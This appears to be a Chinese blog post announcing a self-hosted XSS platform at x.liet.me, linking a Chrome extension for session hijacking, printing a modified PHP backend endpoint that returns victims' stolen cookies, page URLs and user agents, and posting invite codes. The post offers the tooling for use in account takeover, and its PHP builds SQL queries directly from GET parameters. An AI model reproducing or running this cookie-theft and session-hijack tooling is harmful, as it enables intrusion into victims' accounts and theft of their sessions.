首页 > 代码库 > 自改xss小平台x.liet.me上线
自改xss小平台x.liet.me上线
原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2,
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。
平台地址:
x.liet.me
chrome xss mitm attack插件代码地址
https://github.com/lietdai/xss-mitm-attack
修改后的do.php
<?php/** * api.php 接口 * ---------------------------------------------------------------- * OldCMS,site:http://www.oldcms.com */if(!defined(‘IN_OLDCMS‘)) die(‘Access Denied‘);$auth=Val(‘auth‘,‘GET‘);$db=DBConnect();$project=$db->FirstRow("SELECT * FROM ".Tb(‘project‘)." WHERE authCode=‘{$auth}‘");if(empty($project)) exit(‘Auth Err.‘);switch($act){ case ‘content‘: default: $domain=Val(‘domain‘,‘GET‘); $where=‘‘; if(!empty($domain)) $where.=" AND domain=‘{$domain}‘"; $res=$db->Dataset("SELECT content,serverContent FROM ".Tb(‘project_content‘)." WHERE projectId=‘{$project[id]}‘ {$where} ORDER BY id DESC"); $data=array(); foreach($res as $k=>$v){ $row=array(); $content=json_decode($v[‘content‘],true); $serverContent = json_decode($v[‘serverContent‘],true); $row[‘url‘]=$content[‘opener‘]?$content[‘opener‘]: $content[‘toplocation‘]; $row[‘cookie‘]=$content[‘cookie‘]; $serverContent = json_decode($v[‘serverContent‘],true); $row[‘ua‘] = $serverContent[‘HTTP_USER_AGENT‘]?:""; $data[]=$row; } echo JsonEncode($data); break;}?>
发几个邀请码
71ac500c5a331cb7b2806a8e817f167234f3f778fa77c0f7fe8efb162ae70db0df8825cf489fbca96a4663262afd02e165d17af1988fdde9f81696105c0ce3eb4bdf5873cc19e995a925cbf203fdeebaa66411d043503ea0bfe106a98a093c590695d3e66ab68d2b6d88949cbaf575c3fb92a90b9a8264862699ed04a7d432a4d358e24bc7ce3e81c73d54dbbb8b1195
禁止x政教=。=
自改xss小平台x.liet.me上线
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。